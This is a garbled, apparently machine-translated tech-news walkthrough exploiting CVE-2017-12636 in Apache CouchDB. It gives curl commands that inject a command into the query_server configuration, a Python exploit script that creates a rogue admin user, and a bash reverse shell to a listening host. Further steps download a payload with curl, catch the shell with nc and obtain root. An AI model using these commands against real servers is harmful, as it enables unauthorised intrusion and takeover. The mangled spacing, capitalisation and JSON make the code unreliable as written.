Shulou(Shulou.com)06/01 Report--

Vulnerability principle:

Apache CouchDB is an open source database that focuses on ease of use and being a "database that fully embraces web". It is a NoSQL database that uses JSON as the storage format, JavaScript as the query language, MapReduce and HTTP as the API. There are a wide range of applications, such as BBC used in its dynamic content presentation platform, Credit Suisse used in its internal merchandise department's market framework, Meebo, used in its social platform (web and applications).

On November 15, 2017, CVE-2017-12635 and CVE-2017-12636 disclosed that CVE-2017-12636 is an arbitrary command execution vulnerability, and we can modify couchdb's configuration query_server through config api, which will be run when view is designed and executed.

Recurrence of vulnerabilities:

1. Add query_server configuration and write the command to be executed.

Curl-X PUT 'http://pppp:pppp@ target ip:5984/_config/query_servers/cmd'-d' "id > / tmp/success"'

The red arrow is the account and password created by myself, and mine is shown below.

2. Create a new temporary library and temporary table, and insert a record

① curl-X PUT 'http://pppp:pppp@ target machine ip:5984/oll'

② curl-X PUT 'http://pppp:pppp@ target ip:5984/oll/vul'-d' {"_ id": "770895a97726d5ca6d70a22173005c7b"}'

The red arrow refers to the table created by yourself.

3. Call query_server to process data

Curl-X PUT http://pppp:pppp@ target ip:5984/oll/_design/vul-d'{"_ id": "_ design/test", "views": {"wooyun": {"map": ""}}, "language": "cmd"}'- H "Content-Type: application/json"

Perform an EXP bounce Shell:

1. Bounce script: create an index.html under home. Add the following

Bash-I > & / dev/tcp/172.16.11.2/9000 0 > & 1

The red arrow refers to the native ip

two。 Set up another terminal and execute python-m SimpleHTTPServer 8000 under home

3. Create a script for exp.py, as follows:

#! / usr/bin/env python3

Import requests

From requests.auth import HTTPBasicAuth

Target = 'http://192.168.8.148:5984'

Command ='"bash-I > & / dev/tcp/192.168.8.148/4444 0 > & 1"'

Version = 2

Session = requests.session ()

Session.headers = {

'Content-Type': 'application/json'

}

# session.proxies = {

# 'http':' http://127.0.0.1:8085'

#}

Session.put (target +'/ _ users/org.couchdb.user:wooyun', data=''' {

"type": "user"

"name": "wooyun"

"roles": ["_ admin"]

"roles": []

"password": "wooyun"

}')

Session.auth = HTTPBasicAuth ('wooyun',' wooyun')

If version = = 1:

Session.put (target + ('/ _ config/query_servers/cmd'), data=command)

Else:

Host = session.get (target +'/ _ membership'). Json () ['all_nodes'] [0]

Session.put (target +'/ _ node/ {} / _ config/query_servers/cmd'.format (host), data=command)

Session.put (target +'/ wooyun')

Session.put (target +'/ wooyun/test', data=' {"_ id": "wooyuntest"}')

If version = = 1:

Session.post (target +'/ wooyun/_temp_view?limit=10', data=' {"language": "cmd", "map": ""}')

Else:

Session.put (target +'/ wooyun/_design/test', data=' {"_ id": "_ design/test", "views": {"wooyun": {"map": ""}, "language": "cmd"}')

4. Modify the value of command in exp.py to: curl 172.16.11.2 curl 8000-o / tmp/bashell save and execute the command python exp.py.

At this time, you can see that the HTTP service successfully listens to the download request.

5. Reopen a terminal and listen for nc-lnvp 9000 and local port 9000

6. Modify the value of command in exp.py to bash / tmp/bashell, save and execute the command python exp.py, and successfully get the bounced Shell.

Target's ip is the target machine ip (be sure to write correctly, don't learn from my own ip mistakes, worry about the day)

7. It worked.

Get the root.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.